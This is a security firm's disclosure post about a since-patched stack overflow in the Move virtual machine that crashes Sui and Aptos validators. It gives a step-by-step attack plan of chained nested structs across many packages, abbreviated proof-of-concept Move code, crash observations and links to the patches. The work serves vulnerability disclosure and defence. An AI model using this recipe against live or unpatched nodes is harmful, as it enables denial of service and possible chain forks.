June 26, 2023

Critical vulnerability in Move VM:Sui, Aptos and other public chains at risk of crash and hard fork


Background

Move is a new blockchain programming language used by platforms such as Aptos and Sui. Recently, Beosin security research team discovered a stack overflow vulnerability caused by recursive calls. This vulnerability can lead to a total network shutdown, prevent new validators from joining the network, and potentially result in a hard fork.


Upon discovering and verifying this vulnerability, we immediately (on May 30, 2023) contacted the Sui team via email. Following their advice, we submitted the vulnerability to the Immunefi bug bounty platform on June 2, 2023. However, the official team responded that they had internally identified the issue a month ago and had been working on a private security fix. They released the fix on the same day we submitted it to Immunefi (June 2, 2023). We understand and respect their response.



The vulnerability has been fixed in the current version, so we are now publicly disclosing our research findings.


Knowledge Basics

Move virtual machine is implemented in the Rust programming language. The main unit of organization and distribution of Move code is a Package. A Package consists of a set of modules, which are defined in separate files with the extension .move. These files include Move functions and type definitions.


The minimum package directory structure is shown below, which includes a manifest file, a lock file, and a sources subdirectory containing one or more module files.

my_move_package:

    ├── Move.lock

    ├── Move.toml

    ├── sources

        ├── my_module.move


Packages can be published on the blockchain. A Package can contain multiple Modules, and a Module can contain multiple functions and structs.


Function parameters can be structs, and structs can be nested within other structs, as shown below:

module helloworld::hello {
    struct CCC { 
        c : u64
    }
}

module my_module::my_module{
    struct BBB {
        b : helloworld::hello::CCC
    }

    struct AAA { 
        a : BBB
    }

    public fun mint( c_param : helloworld::hello::CCC ){
        let a1 = AAA {
            a : BBB {
                b : c_param
            }
        };

        let a2 = AAA {
            a : BBB {
                b : helloworld::hello::CCC {
                    c : 0x555
                }
            }
        };
    }
}


In the Rust programming language, when making recursive function calls without limiting the depth of the calls, it can lead to stack overflow or depletion of CPU and memory resources. The Move virtual machine is implemented in the Rust language.


Vulnerability Description

Within the Move virtual machine, recursive functions are frequently used to handle various structured data, such as serialized data, nested structs, nested arrays, and generic nesting. To prevent stack overflow caused by recursive calls, it is necessary to check the depth of recursive calls.



The image above shows the depth of parsing for the Move virtual machine limiting simple and complex type structures.


The image above shows the depth limitation of the SIGNATURE_TOKEN within the Move virtual machine bytecode.

Although the Move virtual machine has recursive call depth checks in many places, there are still certain cases that have not been taken into account.


Let’s consider an attack scenario: defining a struct A, then nesting struct B within A, and nesting struct C within B, and so on, continuing the nesting indefinitely. If the Move virtual machine uses a recursive function to handle this nesting relationship, it will crash due to stack overflow or insufficient resources. Although Move has limitations on the number of structs that can be defined within each module, we can create an unlimited number of modules.


This gives us an attack strategy:

1. Generate 25 packages (can be more than 25), each containing 1 module.

2. Each module defines 64 structs (can be more than 64 in Aptos) with a chained nesting relationship. The first struct in each module nests the last struct from the previous module.

3. Each module includes a callable entry function. This function takes a parameter of the type of the last struct (the 64th struct) from the previous module. The function creates and returns an instance of the last struct in the current module.

4. Publish each package in order.

5. Call the entry function in each module in order.


During our testing on Sui mainnet_v1.1.1_, we observed the following phenomena in our test environment with 4 validators:

1. After running the PoC once, all 4 validators immediately crash due to stack overflow.

2. After at least 3 validators crash and restart, all full nodes crash.

3. After at least 3 validators crash and restart, new validators joining the network crash at least once.

4. After at least 3 validators crash and restart, new full nodes joining the network sometimes crash once.

5. If lucky, certain validators or full nodes cannot be restarted after a crash unless all local databases are deleted.


Regarding Sui mainnet_v1.2.0, we observed the following phenomena in our test environment with 4 validators:

1. After running PoC once, at least 1 validator crashes due to stack overflow or out of memory.

2. Running the PoC again can make the second validator crash. After that, the entire network cannot accept new transactions.

3. Crashed validators may be unable to restart. Deleting all local databases of the crashed validator and running it again would result in a crash after some time, and it cannot be restarted anymore.

4. When a new validator joins the network, it crashes.


We conducted a simple test on Aptos and found that Aptos also crashes.


PoC

Sui PoC

module hello_world_2::hello{

use std::string;

use sui::object::{Self, UID};

use sui::transfer;

use sui::tx_context::{Self, TxContext};


struct T_0 has key,store{

id : UID,

m : hello_world_1::hello::T_63

}

struct T_1 has key,store{

id : UID,

m : T_0

}


........other not printed.........


struct T_62 has key,store{

id : UID,

m : T_61

}

struct T_63 has key,store{

id : UID,

m : T_62

}

public entry fun mint(previous: hello_world_1::hello::T_63 ,ctx: &mut TxContext) {

let object = T_63{

id: object::new(ctx),

m : T_62{

id: object::new(ctx),

m : T_61{

id: object::new(ctx),


........other not printed.........


m : T_1{

id: object::new(ctx),

m : T_0{

id: object::new(ctx),

m : previous}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}};

transfer::transfer(object, tx_context::sender(ctx));

}

}


For each created module, it is published to the Sui chain and the “mint” function is called to obtain the created “object.” The “object” is then passed as a parameter to the “mint” function of the next module until the Sui node crashes.


Aptos PoC

For each created module, it is published to the Aptos chain and the “mint” function is called until the Aptos node crashes.

module Test2::test_module2{

struct Struct0 has key,store,drop {

m : Test1::test_module1::Struct200

}

struct Struct1 has key,store,drop{

m : Struct0

}

........other not printed.........


struct Struct199 has key,store,drop{

m : Struct198

}

struct Struct200 has key,store,drop{

m : Struct199

}

public entry fun mint(_account : signer){

let previous0 = 5554444;

let previous1 = Test0::test_module0::test_function(previous0);

let previous2 = Test1::test_module1::test_function(previous1);

let _current = test_function(previous2);

}

public fun test_function(previous : Test1::test_module1::Struct200) : Struct200{

let object = Struct200{

m:Struct199{

........other not printed.........

m:Struct1{

m:Struct0{

m:previous}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}};

object

}

}


Vulnerability Fix

Sui mainnet_v1.2.1 (June 2, 2023), Aptos mainnet_v1.4.3 (June 3, 2023), and Move-language versions released after June 10, 2023 have addressed this vulnerability.


Sui patch:

https://github.com/MystenLabs/sui/commit/8b681515c0cf435df2a54198a28ab4ef574d202b

The patch code imposes limitations on the depth of type references in the creation of structs, vectors, and generics. The key function added is “check_depth_of_type.”


Aptos patch:

https://github.com/aptos-labs/aptos-core/commit/47a0391c612407fe0b1051ef658a29e35d986963

Similar to Sui, the patch code also imposes limitations on the depth of type references in the creation of structs, vectors, and generics. The key function added is “check_depth_of_type.”


Move-language patch:

https://github.com/move-language/move/commit/8f5303a365cf9da7554f8f18c393b3d6eb4867f2

Similar to Sui and Aptos, the patch code also imposes limitations on the depth of type references in the creation of structs, vectors, and generics. The key function added is “check_depth_of_type.”


Vulnerability Impact

This vulnerability exploit is very simple and consumes a very small amount of gas per attack. However, its impact is significant and can lead to a total network shutdown, prevent new validator nodes from joining the network, and potentially cause a hard fork. This vulnerability affects Sui mainnet_ prior to v1.2.1, Aptos mainnet_ prior to v1.4.3, and versions of Move-language prior to June 10th.


Why can this vulnerability potentially cause a hard fork?

1. Malicious attackers can create struct nesting relationships of arbitrary depth and deploy these malicious structs on the blockchain. They can then send immutable malicious transactions targeting these structs. Although this process may cause network crashes, some malicious transactions will still be deployed on the chain.

2. To patch this vulnerability, we can limit the depth of recursive calls. However, this means that we can no longer reference the malicious structs already deployed on the blockchain and cannot verify historical transactions related to these malicious structs within the virtual machine. Only a hard fork can resolve this issue.

3. Due to the severe impact of hard fork testing on the current network, we have abandoned that test. However, theoretically, we believe it is feasible.


Summary

A simple recursive function call leading to a stack overflow can cause a total network shutdown, and with additional manipulation, it may even result in a hard fork. Therefore, the security of the blockchain should always be the top priority. We recommend project teams to pay close attention to such vulnerabilities and consider engaging professional blockchain security organizations for comprehensive audits.


Contact

If you need any blockchain security services, welcome to contact us:

Official Website  Beosin EagleEye  Twitter  Telegram  LinkedIn


Related Project

Related Project Secure Score

Guess you like
Learn More
  • A $60 million wallet theft. Beosin KYT Reveals the Hackers' Money Laundering Tactics

    June 26, 2023

  • What is Stacks and what challenges may this BTC Layer2 Network face?

    June 26, 2023

  • H1 2023 Global Web3 Security Report, AML Analysis & Crypto Regulatory Landscape

    July 04, 2023

  • H1 2023 Global Web3 Security Report, AML Analysis & Crypto Regulatory Landscape (Text Version)

    July 04, 2023

Join the community to discuss.